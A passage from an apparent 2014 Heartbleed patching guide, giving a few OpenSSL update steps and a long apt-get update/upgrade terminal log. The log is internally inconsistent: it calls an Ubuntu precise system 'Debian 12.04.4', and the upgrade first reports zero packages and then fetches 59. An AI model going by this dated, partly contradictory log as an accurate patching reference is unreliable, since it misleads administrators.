need to be restarted `ps uwwp $(sudo find /proc -maxdepth 2 -name maps -exec grep -HE `/libssl.so.* (deleted)` {} ; | cut -d/ -f3 | sort -u)`\r\nor still running `ls -l /proc/*/fd | grep ssl.*(deleted)`\r\n10. Last step is to reboot by usage of the basic `sudo reboot` to ensure the updates and upgrades was successful\r\n\r\n\r\n\r\nMay delete or overwirte important exisiting data\r\napt-get purge openssl\r\n\r\nClean the system automatically\r\napt-get autoremove && apt-get autoclean\r\n\r\nDownload and compile the newst version of openssl\r\nwget https://www.openssl.org/source/openssl-1.0.1g.tar.gz\r\n\r\nInspect what is causing an error to pin - Old Repository & Co.\r\napt-cache policy openssl libssl-dev\r\n\r\nNote: Remember that a verified certificate needs to be revoked to generate a new after a compromise.\r\n\r\n\r\n------------- Reboot\r\nanalyst-updater@h2072833:~#\r\nlogin as: analyst-updater\r\nanalyst-updater@h2072833.ben-kenobi-server.net\\'s password:\r\nWelcome to Debian 12.04.4 (GNU/Linux x86_64)\r\nLast login: Wed Apr 9 12:00:55 2014 from xxx.dip0.ipconnect.com\r\n\r\nanalyst-updater@h2072833:~# openssl version\r\nOpenSSL 1.0.1 14 Mar 2012\r\n\r\nanalyst-updater@h2072833:~# apt-get update\r\nHit ftp://ftp.ben-kenobi-server.net precise Release.gpg\r\nHit ftp://ftp.ben-kenobi-server.net precise-updates Release.gpg\r\nHit ftp://ftp.ben-kenobi-server.net precise-security Release.gpg\r\nHit ftp://ftp.ben-kenobi-server.net precise Release\r\nHit ftp://ftp.ben-kenobi-server.net precise-updates Release\r\nHit ftp://ftp.ben-kenobi-server.net precise-security Release\r\nHit ftp://ftp.ben-kenobi-server.net precise/main Sources\r\nHit ftp://ftp.ben-kenobi-server.net precise/restricted Sources\r\nHit ftp://ftp.ben-kenobi-server.net precise/universe Sources\r\nHit ftp://ftp.ben-kenobi-server.net precise/multiverse Sources\r\nHit ftp://ftp.ben-kenobi-server.net precise/main amd64 Packages\r\nHit ftp://ftp.ben-kenobi-server.net precise/restricted amd64 Packages\r\nHit ftp://ftp.ben-kenobi-server.net precise/universe amd64 Packages\r\nHit ftp://ftp.ben-kenobi-server.net precise/multiverse amd64 Packages\r\nHit ftp://ftp.ben-kenobi-server.net precise/main i386 Packages\r\nHit ftp://ftp.ben-kenobi-server.net precise/restricted i386 Packages\r\nHit ftp://ftp.ben-kenobi-server.net precise/universe i386 Packages\r\nHit ftp://ftp.ben-kenobi-server.net precise/multiverse i386 Packages\r\nHit ftp://ftp.ben-kenobi-server.net precise/main TranslationIndex\r\nHit ftp://ftp.ben-kenobi-server.net precise/multiverse TranslationIndex\r\nHit ftp://ftp.ben-kenobi-server.net precise/restricted TranslationIndex\r\nHit ftp://ftp.ben-kenobi-server.net precise/universe TranslationIndex\r\nHit ftp://ftp.ben-kenobi-server.net precise-updates/main Sources\r\nHit ftp://ftp.ben-kenobi-server.net precise-updates/restricted Sources\r\nHit ftp://ftp.ben-kenobi-server.net precise-updates/universe Sources\r\nHit ftp://ftp.ben-kenobi-server.net precise-updates/multiverse Sources\r\nHit ftp://ftp.ben-kenobi-server.net precise-updates/main amd64 Packages\r\nHit ftp://ftp.ben-kenobi-server.net precise-updates/restricted amd64 Packages\r\nHit ftp://ftp.ben-kenobi-server.net precise-updates/universe amd64 Packages\r\nHit ftp://ftp.ben-kenobi-server.net precise-updates/multiverse amd64 Packages\r\nHit ftp://ftp.ben-kenobi-server.net precise-updates/main i386 Packages\r\nHit ftp://ftp.ben-kenobi-server.net precise-updates/restricted i386 Packages\r\nHit ftp://ftp.ben-kenobi-server.net precise-updates/universe i386 Packages\r\nHit ftp://ftp.ben-kenobi-server.net precise-updates/multiverse i386 Packages\r\nHit ftp://ftp.ben-kenobi-server.net precise-updates/main TranslationIndex\r\nHit ftp://ftp.ben-kenobi-server.net precise-updates/multiverse TranslationIndex\r\nHit ftp://ftp.ben-kenobi-server.net precise-updates/restricted TranslationIndex\r\nHit ftp://ftp.ben-kenobi-server.net precise-updates/universe TranslationIndex\r\nHit ftp://ftp.ben-kenobi-server.net precise-security/main Sources\r\nHit ftp://ftp.ben-kenobi-server.net precise-security/restricted Sources\r\nHit ftp://ftp.ben-kenobi-server.net precise-security/universe Sources\r\nHit ftp://ftp.ben-kenobi-server.net precise-security/multiverse Sources\r\nHit ftp://ftp.ben-kenobi-server.net precise-security/main amd64 Packages\r\nHit ftp://ftp.ben-kenobi-server.net precise-security/restricted amd64 Packages\r\nHit ftp://ftp.ben-kenobi-server.net precise-security/universe amd64 Packages\r\nHit ftp://ftp.ben-kenobi-server.net precise-security/multiverse amd64 Packages\r\nHit ftp://ftp.ben-kenobi-server.net precise-security/main i386 Packages\r\nHit ftp://ftp.ben-kenobi-server.net precise-security/restricted i386 Packages\r\nHit ftp://ftp.ben-kenobi-server.net precise-security/universe i386 Packages\r\nHit ftp://ftp.ben-kenobi-server.net precise-security/multiverse i386 Packages\r\nHit ftp://ftp.ben-kenobi-server.net precise-security/main TranslationIndex\r\nHit ftp://ftp.ben-kenobi-server.net precise-security/multiverse TranslationIndex\r\nHit ftp://ftp.ben-kenobi-server.net precise-security/restricted TranslationIndex\r\nHit ftp://ftp.ben-kenobi-server.net precise-security/universe TranslationIndex\r\nGet:1 ftp://ftp.ben-kenobi-server.net precise/main Translation-en_GB [96.4 kB]\r\nHit ftp://ftp.ben-kenobi-server.net precise/main Translation-en\r\nHit ftp://ftp.ben-kenobi-server.net precise/main Translation-de\r\nGet:2 ftp://ftp.ben-kenobi-server.net precise/multiverse Translation-en_GB [79.8 kB]\r\nHit ftp://ftp.ben-kenobi-server.net precise/multiverse Translation-en\r\nHit ftp://ftp.ben-kenobi-server.net precise/multiverse Translation-de\r\nGet:3 ftp://ftp.ben-kenobi-server.net precise/restricted Translation-en_GB [2,406 B]\r\nHit ftp://ftp.ben-kenobi-server.net precise/restricted Translation-en\r\nHit ftp://ftp.ben-kenobi-server.net precise/restricted Translation-de\r\nGet:4 ftp://ftp.ben-kenobi-server.net precise/universe Translation-en_GB [5,492 B]\r\nHit ftp://ftp.ben-kenobi-server.net precise/universe Translation-en\r\nHit ftp://ftp.ben-kenobi-server.net precise/universe Translation-de\r\nGet:5 ftp://ftp.ben-kenobi-server.net precise-updates/main Translation-en_GB [96.4 kB]\r\nHit ftp://ftp.ben-kenobi-server.net precise-updates/main Translation-en\r\nHit ftp://ftp.ben-kenobi-server.net precise-updates/main Translation-de\r\nGet:6 ftp://ftp.ben-kenobi-server.net precise-updates/multiverse Translation-en_GB [79.8 kB]\r\nHit ftp://ftp.ben-kenobi-server.net precise-updates/multiverse Translation-en\r\nHit ftp://ftp.ben-kenobi-server.net precise-updates/multiverse Translation-de\r\nGet:7 ftp://ftp.ben-kenobi-server.net precise-updates/restricted Translation-en_GB [2,406 B]\r\nHit ftp://ftp.ben-kenobi-server.net precise-updates/restricted Translation-en\r\nHit ftp://ftp.ben-kenobi-server.net precise-updates/restricted Translation-de\r\nGet:8 ftp://ftp.ben-kenobi-server.net precise-updates/universe Translation-en_GB [5,492 B]\r\nHit ftp://ftp.ben-kenobi-server.net precise-updates/universe Translation-en\r\nHit ftp://ftp.ben-kenobi-server.net precise-updates/universe Translation-de\r\nHit ftp://ftp.ben-kenobi-server.net precise-security/main Translation-en\r\nHit ftp://ftp.ben-kenobi-server.net precise-security/multiverse Translation-en\r\nHit ftp://ftp.ben-kenobi-server.net precise-security/restricted Translation-en\r\nHit ftp://ftp.ben-kenobi-server.net precise-security/universe Translation-en\r\nFetched 368 kB in 0s (808 kB/s)\r\nReading package lists... Done\r\n\r\nanalyst-updater@h2072833:~# apt-get upgrade\r\nReading package lists... Done\r\nBuilding dependency tree\r\nReading state information... Done\r\n0 to upgrade, 0 to newly install, 0 to remove and 0 not to upgrade.\r\n1 not fully installed or removed.\r\nAfter this operation, 0 B of additional disk space will be used.\r\nDo you want to continue [Y/n]? y\r\n apache2 apache2-mpm-prefork apache2-prefork-dev apache2-utils apache2.2-bin\r\n apache2.2-common ca-certificates clamav clamav-base clamav-freshclam file\r\n icedtea-6-jre-cacao icedtea-6-jre-jamvm ifupdown initramfs-tools\r\n initramfs-tools-bin libapache2-mod-php5 libclamav6 libgtk-3-0 libgtk-3-bin\r\n libgtk-3-common libgudev-1.0-0 libgudev-1.0-0:i386 libmagic1 libnss3\r\n libnss3:i386 libnss3-1d libpq-dev libpq5 librsvg2-2:i386\r\n librsvg2-common:i386 libssl-dev libssl-doc libssl1.0.0 libssl1.0.0:i386\r\n libudev0 libudev0:i386 linux-firmware openjdk-6-jre-headless\r\n openjdk-6-jre-lib openssh-client openssh-server openssl php5 php5-cgi\r\n php5-cli php5-common php5-curl php5-gd php5-mysql php5-sqlite php5-xsl\r\n postgresql-9.1 postgresql-client-9.1 sudo tzdata tzdata-java udev udisks\r\n59 to upgrade, 0 to newly install, 0 to remove and 0 not to upgrade.\r\n1 not fully installed or removed.\r\nNeed to get 108 MB of archives.\r\nAfter this operation, 4,201 kB of additional disk space will be used.\r\nDo you want to continue [Y/n]? y\r\nGet:1 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main libssl-d oc all 1.0.1-4ubuntu5.12 [1,032 kB]\r\nGet:2 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main libssl-d ev amd64 1.0.1-4ubuntu5.12 [1,575 kB]\r\nGet:3 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main libssl1. 0.0 i386 1.0.1-4ubuntu5.12 [1,009 kB]\r\nGet:4 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main libssl1. 0.0 amd64 1.0.1-4ubuntu5.12 [1,048 kB]\r\nGet:5 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main libudev0 i386 175-0ubuntu9.5 [32.1 kB]\r\nGet:6 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main libudev0 amd64 175-0ubuntu9.5 [28.4 kB]\r\nGet:7 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main libgtk-3 -bin amd64 3.4.2-0ubuntu0.7 [15.9 kB]\r\nGet:8 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main libgtk-3 -0 amd64 3.4.2-0ubuntu0.7 [2,285 kB]\r\nGet:9 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main libgtk-3 -common all 3.4.2-0ubuntu0.7 [145 kB]\r\nGet:10 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main libgude v-1.0-0 i386 1:175-0ubuntu9.5 [14.6 kB]\r\nGet:11 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main libgude v-1.0-0 amd64 1:175-0ubuntu9.5 [14.5 kB]\r\nGet:12 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main libnss3 -1d amd64 3.15.4-0ubuntu0.12.04.2 [13.4 kB]\r\nGet:13 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main libnss3 i386 3.15.4-0ubuntu0.12.04.2 [1,292 kB]\r\nGet:14 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main libnss3 amd64 3.15.4-0ubuntu0.12.04.2 [1,229 kB]\r\nGet:15 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main librsvg 2-common i386 2.36.1-0ubuntu1.1 [20.3 kB]\r\nGet:16 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main librsvg 2-2 i386 2.36.1-0ubuntu1.1 [109 kB]\r\nGet:17 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main file am d64 5.09-2ubuntu0.3 [19.7 kB]\r\nGet:18 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main libmagi c1 amd64 5.09-2ubuntu0.3 [217 kB]\r\nGet:19 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main tzdata- java all 2014a-0ubuntu0.12.04 [126 kB]\r\nGet:20 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main tzdata all 2014a-0ubuntu0.12.04 [448 kB]\r\nGet:21 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main php5-cg i amd64 5.3.10-1ubuntu3.11 [6,104 kB]\r\nGet:22 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main openssl amd64 1.0.1-4ubuntu5.12 [523 kB]\r\nGet:23 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main apache2 -prefork-dev amd64 2.2.22-1ubuntu1.5 [138 kB]\r\nGet:24 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main apache2 amd64 2.2.22-1ubuntu1.5 [1,494 B]\r\nGet:25 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main apache2 -mpm-prefork amd64 2.2.22-1ubuntu1.5 [2,400 B]\r\nGet:26 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main apache2 .2-common amd64 2.2.22-1ubuntu1.5 [226 kB]\r\nGet:27 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main apache2 .2-bin amd64 2.2.22-1ubuntu1.5 [1,339 kB]\r\nGet:28 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main apache2 -utils amd64 2.2.22-1ubuntu1.5 [91.3 kB]\r\nGet:29 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main libapac he2-mod-php5 amd64 5.3.10-1ubuntu3.11 [3,137 kB]\r\nGet:30 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main php5-my sql amd64 5.3.10-1ubuntu3.11 [76.6 kB]\r\nGet:31 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main php5-xs l amd64 5.3.10-1ubuntu3.11 [14.0 kB]\r\nGet:32 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main php5-cu rl amd64 5.3.10-1ubuntu3.11 [28.0 kB]\r\nGet:33 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main php5-gd amd64 5.3.10-1ubuntu3.11 [38.8 kB]\r\nGet:34 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main php5-cl i amd64 5.3.10-1ubuntu3.11 [3,051 kB]\r\nGet:35 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main php5-sq lite amd64 5.3.10-1ubuntu3.11 [27.6 kB]\r\nGet:36 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main php5-co mmon amd64 5.3.10-1ubuntu3.11 [1,797 kB]\r\nGet:37 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main icedtea -6-jre-cacao amd64 6b30-1.13.1-1ubuntu2~0.12.04.3 [776 kB]\r\nGet:38 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main openjdk -6-jre-lib all 6b30-1.13.1-1ubuntu2~0.12.04.3 [6,211 kB]\r\nGet:39 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main icedtea -6-jre-jamvm amd64 6b30-1.13.1-1ubuntu2~0.12.04.3 [527 kB]\r\nGet:40 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main openjdk -6-jre-headless amd64 6b30-1.13.1-1ubuntu2~0.12.04.3 [32.8 MB]\r\nGet:41 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main sudo amd64 1.8.3p1-1ubuntu3.6 [299 kB]\r\nGet:42 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main ifupdown amd64 0.7~beta2ubuntu11 [48.4 kB]\r\nGet:43 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main initramfs-tools all 0.99ubuntu13.5 [49.0 kB]\r\nGet:44 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main initramfs-tools-bin amd64 0.99ubuntu13.5 [9,782 B]\r\nGet:45 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main udev amd64 175-0ubuntu9.5 [314 kB]\r\nGet:46 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main ca-certificates all 20130906ubuntu0.12.04.1 [192 kB]\r\nGet:47 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main openssh-server amd64 1:5.9p1-5ubuntu1.3 [338 kB]\r\nGet:48 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main openssh-client amd64 1:5.9p1-5ubuntu1.3 [943 kB]\r\nGet:49 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main libclamav6 amd64 0.98.1+dfsg-4ubuntu1~ubuntu12.04.2 [4,208 kB]\r\nGet:50 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main clamav-base all 0.98.1+dfsg-4ubuntu1~ubuntu12.04.2 [106 kB]\r\nGet:51 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main clamav-freshclam amd64 0.98.1+dfsg-4ubuntu1~ubuntu12.04.2 [120 kB]\r\nGet:52 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main clamav amd64 0.98.1+dfsg-4ubuntu1~ubuntu12.04.2 [140 kB]\r\nGet:53 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main libpq-dev amd64 9.1.13-0ubuntu0.12.04 [215 kB]\r\nGet:54 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main libpq5 amd64 9.1.13-0ubuntu0.12.04 [93.0 kB]\r\nGet:55 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main linux-firmware all 1.79.11 [27.7 MB]\r\nGet:56 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main php5 all 5.3.10-1ubuntu3.11 [1,076 B]\r\nGet:57 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main postgresql-9.1 amd64 9.1.13-0ubuntu0.12.04 [4,307 kB]\r\nGet:58 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main postgresql-client-9.1 amd64 9.1.13-0ubuntu0.12.04 [959 kB]\r\nGet:59 ftp://ftp.ben-kenobi-server.net/pub/linux/ubuntu/ precise-updates/main udisks amd64 1.0.4-5ubuntu2.2 [250 kB]\r\nFetched 108 MB in 26s (4,140 kB/s)\r\nExtract templates from packages: 100%\r\nPreconfiguring packages ...\r\n(Reading database ... 159313 files and directories currently installed.)\r\nPreparing to replace libssl-doc 1.0.1-4ubuntu5.11 (using .../libssl-doc_1.0.1-4ubuntu5.12_all.deb) ...\r\nUnpacking replacement libssl-doc ...\r\nPreparing to replace libssl-dev 1.0.1-4ubuntu5.11 (using .../libssl-dev_1.0.1-4ubuntu5.12_amd64.deb) ...\r\nUnpacking replacement libssl-dev ...\r\nPreparing to replace libssl1.0.0 1.0.1-4ubuntu5.11 (using .../libssl1.0.0_1.0.1-4ubuntu5.12_amd64.deb) ...\r\nDe-configuring libssl1.0.0:i386 ...\r\nUnpacking replacement libssl1.0.0 ...\r\nPreparing to replace libssl1.0.0:i386 1.0.1-4ubuntu5.11 (using .../libssl1.0.0_1.0.1-4ubuntu5.12_i386.deb) ...\r\nUnpacking replacement libssl1.0.0:i386 ...\r\nProcessing triggers for man-db ...\r\nSetting up libssl1.0.0 (1.0.1-4ubuntu5.12) ...\r\nSetting up libssl1.0.0:i386 (1.0.1-4ubuntu5.12) ...\r\nProcessing triggers for libc-bin ...\r\nldconfig deferred processing now taking place\r\n(Reading database ... 159313 files and directories currently installed.)\r\nPreparing to replace libudev0:i386 175-0ubuntu9.4 (using .../libudev0_175-0ubuntu9.5_i386.deb) ...\r\nDe-configuring libudev0 ...\r\nUnpacking replacement libudev0:i386 ...\r\nPreparing to replace libudev0 175-0ubuntu9.4 (using .../libudev0_175-0ubuntu9.5_amd64.deb) ...\r\nUnpacking replacement libudev0 ...\r\nSetting up libudev0:i386 (175-0ubuntu9.5) ...\r\nSetting up libudev0 (175-0ubuntu9.5) ...\r\nProcessing triggers for libc-bin ...\r\nldconfig deferred processing now taking place\r\n(Reading database ... 159313 files and directories currently installed.)\r\nPreparing to replace libgtk-3-bin 3.4.2-0ubuntu0.6 (using .../libgtk-3-bin_3.4.2-0ubuntu0.7_amd64.deb) ...\r\nLeaving \\'diversion of /usr/sbin/update-icon-caches to /usr/sbin/update-icon-caches.gtk2 by libgtk-3-bin\\'\r\nLeaving \\'diversion of /usr/share/man/man8/update-icon-caches.8.gz to /usr/share/man/man8/update-icon-caches.gtk2.8.gz by libgtk-3-bin\\'\r\nUnpacking replacement libgtk-3-bin ...\r\nPreparing to replace libgtk-3-0 3.4.2-0ubuntu0.6 (using .../libgtk-3-0_3.4.2-0ubuntu0.7_amd64.deb) ...\r\nUnpacking replacement libgtk-3-0 ...\r\nPreparing to replace libgtk-3-common 3.4.2-0ubuntu0.6 (using .../libgtk-3-common_3.4.2-0ubuntu0.7_all.deb) ...\r\nUnpacking replacement libgtk-3-common ...\r\nPreparing to replace libgudev-1.0-0:i386 1:175-0ubuntu9.4 (using .../libgudev-1.0-0_1%3a175-0ubuntu9.5_i386.deb) ...\r\nDe-configuring libgudev-1.0-0 ...\r\nUnpacking replacement libgudev-1.0-0:i386 ...\r\nPreparing to replace libgudev-1.0-0 1:175-0ubuntu9.4 (using .../libgudev-1.0-0_1%3a175-0ubuntu9.5_amd64.deb) ...\r\nUnpacking replacement libgudev-1.0-0 ...\r\nProcessing triggers for man-db ...\r\nProcessing triggers for libglib2.0-0 ...\r\nProcessing triggers for libglib2.0-0:i386 ...\r\nSetting up libgudev-1.0-0:i386 (1:175-0ubuntu9.5) ...\r\nSetting up libgudev-1.0-0 (1:175-0ubuntu9.5) ...\r\nProcessing triggers for libc-bin ...\r\nldconfig deferred processing now taking place\r\n(Reading database ... 159313 files and directories currently installed.)\r\nPreparing to replace libnss3-1d 3.15.4-0ubuntu0.12.04.1 (using .../libnss3-1d_3.15.4-0ubuntu0.12.04.2_amd64.deb) ...\r\nUnpacking replacement libnss3-1d ...\r\nPreparing to replace libnss3:i386 3.15.4-0ubuntu0.12.04.1 (using .../libnss3_3.15.4-0ubuntu0.12.04.2_i386.deb) ...\r\nDe-configuring libnss3 ...\r\nUnpacking replacement libnss3:i386 ...\r\nPreparing to replace libnss3 3.15.4-0ubuntu0.12.04.1 (using .../libnss3_3.15.4-0ubuntu0.12.04.2_amd64.deb) ...\r\nUnpacking replacement libnss3 ...\r\nSetting up libnss3:i386 (3.15.4-0ubuntu0.12.04.2) ...\r\nSetting up libnss3 (3.15.4-0ubuntu0.12.04.2) ...\r\nProcessing triggers for libc-bin ...\r\nldconfig deferred processing now taking place\r\n(Reading database ... 159313 files and directories currently installed.)\r\nPreparing to replace librsvg2-common:i386 2.36.1-0ubuntu1 (using .../librsvg2-common_2.36.1-0ubuntu1.1_i386.deb) ...\r\nUnpacking replacement librsvg2-common:i386 ...\r\nPreparing to replace librsvg2-2:i386 2.36.1-0ubuntu1 (using .../librsvg2-2_2.36.1-0ubuntu1.1_i386.deb) ...\r\nUnpacking replacement librsvg2-2:i386 ...\r\nPreparing to replace file 5.09-2ubuntu0.2 (using .../file_5.09-2ubuntu0.3_amd64.deb) ...\r\nUnpacking replacement file ...\r\nPreparing to replace libmagic1 5.09-2ubuntu0.2 (using .../libmagic1_5.09-2ubuntu0.3_amd64.deb) ...\r\nUnpacking replacement libmagic1 ...\r\nPreparing to replace tzdata-java 2013g-0ubuntu0.12.04 (using .../tzdata-java_2014a-0ubuntu0.12.04_all.deb) ...\r\nUnpacking replacement tzdata-java ...\r\nPreparing to replace tzdata 2013g-0ubuntu0.12.04 (using .../tzdata_2014a-0ubuntu0.12.04_all.deb) ...\r\nUnpacking replacement tzdata ...\r\nProcessing triggers for libgdk-pixbuf2.0-0:i386 ...\r\nProcessing triggers for man-db ...\r\nSetting up tzdata (2014a-0ubuntu0.12.04) ...\r\n\r\nCurrent default time zone: \\'Etc/GMT\\'\r\nLocal time is now: Wed Apr 9 12:04:24 GMT 2014.\r\nUniversal Time is now: Wed Apr 9 12:04:24 UTC 2014.\r\nRun \\'dpkg-reconfigure tzdata\\' if you wish to change it.\r\n\r\n(Reading database ... 159289 files and directories currently installed.)\r\nPreparing to replace php5-cgi 5.3.10-1ubuntu3.10 (using .../php5-cgi_5.3.10-1ubuntu3.11_amd64.deb) ...\r\nUnpacking replacement php5-cgi ...\r\nPreparing to replace openssl 1.0.1-4ubuntu5.11 (using .../openssl_1.0.1-4ubuntu5.12_amd64.deb) ...\r\nUnpacking replacement openssl ...\r\nPreparing to replace apache2-prefork-dev 2.2.22-1ubuntu1.4 (using .../apache2-prefork-dev_2.2.22-1ubuntu1.5_amd64.deb) ...\r\nUnpacking replacement apache2-prefork-dev ...\r\nPreparing to replace apache2 2.2.22-1ubuntu1.4 (using .../apache2_2.2.22-1ubuntu1.5_amd64.deb) ...\r\nUnpacking replacement apache2 ...\r\nPreparing to replace apache2-mpm-prefork 2.2.22-1ubuntu1.4 (using .../apache2-mpm-prefork_2.2.22-1ubuntu1.5_amd64.deb) ...\r\n * Stopping web server apache2 ... waiting . [ OK ]\r\nUnpacking replacement apache2-mpm-prefork ...\r\nPreparing to replace apache2.2-common 2.2.22-1ubuntu1.4 (using .../apache2.2-common_2.2.22-1ubuntu1.5_amd64.deb) ...\r\nUnpacking replacement apache2.2-common ...\r\nPreparing to replace apache2.2-bin 2.2.22-1ubuntu1.4 (using .../apache2.2-bin_2.2.22-1ubuntu1.5_amd64.deb) ...\r\nUnpacking replacement apache2.2-bin ...\r\nPreparing to replace apache2-utils 2.2.22-1ubuntu1.4 (using .../apache2-utils_2.2.22-1ubuntu1.5_amd64.deb) ...\r\nUnpacking replacement apache2-utils ...\r\nPreparing to replace libapache2-mod-php5 5.3.10-1ubuntu3.10 (using .../libapache2-mod-php5_5.3.10-1ubuntu3.11_amd64.deb) ...\r\nUnpacking replacement libapache2-mod-php5 ...\r\nPreparing to replace php5-mysql 5.3.10-1ubuntu3.10 (using .../php5-mysql_5.3.10-1ubuntu3.11_amd64.deb) ...\r\nUnpacking replacement php5-mysql ...\r\nPreparing to replace php5-xsl 5.3.10-1ubuntu3.10 (using .../php5-xsl_5.3.10-1ubuntu3.11_amd64.deb) ...\r\nUnpacking replacement php5-xsl ...\r\nPreparing to replace php5-curl 5.3.10-1ubuntu3.10 (using .../php5-curl_5.3.10-1ubuntu3.11_amd64.deb) ...\r\nUnpacking replacement php5-curl ...\r\nPreparing to replace php5-gd 5.3.10-1ubuntu3.10 (using .../php5-gd_5.3.10-1ubuntu3.11_amd64.deb) ...\r\nUnpacking replacement php5-gd ...\r\nPreparing to replace php5-cli 5.3.10-1ubuntu3.10 (using .../php5-cli_5.3.10-1ubuntu3.11_amd64.deb) ...\r\nUnpacking replacement php5-cli ...\r\nPreparing to replace php5-sqlite 5.3.10-1ubuntu3.10 (using .../php5-sqlite_5.3.10-1ubuntu3.11_amd64.deb) ...\r\nUnpacking replacement php5-sqlite ...\r\nPreparing to replace php5-common 5.3.10-1ubuntu3.10 (using .../php5-common_5.3.10-1ubuntu3.11_amd64.deb) ...\r\nUnpacking replacement php5-common ...\r\nPreparing to replace icedtea-6-jre-cacao 6b30-1.13.1-1ubuntu2~0.12.04.1 (using .../icedtea-6-jre-cacao_6b30-1.13.1-1ubuntu2~0.12.04.3_amd64.deb) ...\r\nUnpacking replacement icedtea-6-jre-cacao ...\r\nPreparing to replace openjdk-6-jre-lib 6b30-1.13.1-1ubuntu2~0.12.04.1 (using .../openjdk-6-jre-lib_6b30-1.13.1-1ubuntu2~0.12.04.3_all.deb) ...\r\nUnpacking replacement openjdk-6-jre-lib ...\r\nPreparing to replace icedtea-6-jre-jamvm 6b30-1.13.1-1ubuntu2~0.12.04.1 (using .../icedtea-6-jre-jamvm_6b30-1.13.1-1ubuntu2~0.12.04.3_amd64.deb) ...\r\nUnpacking replacement icedtea-6-jre-jamvm ...\r\nPreparing to replace openjdk-6-jre-headless 6b30-1.13.1-1ubuntu2~0.12.04.1 (using .../openjdk-6-jre-headless_6b30-1.13.1-1ubuntu2~0.12.04.3_amd64.deb) ...\r\nUnpacking replacement openjdk-6-jre-headless ...\r\nPreparing to replace sudo 1.8.3p1-1ubuntu3.4 (using .../sudo_1.8.3p1-1ubuntu3.6_amd64.deb) ...\r\nUnpacking replacement sudo ...\r\nPreparing to replace ifupdown 0.7~beta2ubuntu10 (using .../ifupdown_0.7~beta2ubuntu11_amd64.deb) ...\r\nUnpacking replacement ifupdown ...\r\nPreparing to replace initramfs-tools 0.99ubuntu13.4 (using .../initramfs-tools_0.99ubuntu13.5_all.deb) ...\r\nUnpacking replacement initramfs-tools ...\r\nPreparing to replace initramfs-tools-bin 0.99ubuntu13.4 (using .../initramfs-tools-bin_0.99ubuntu13.5_amd64.deb) ...\r\nUnpacking replacement initramfs-tools-bin ...\r\nPreparing to replace udev 175-0ubuntu9.4 (using .../udev_175-0ubuntu9.5_amd64.deb) ...\r\nAdding \\'diversion of /sbin/udevadm to /sbin/udevadm.upgrade by 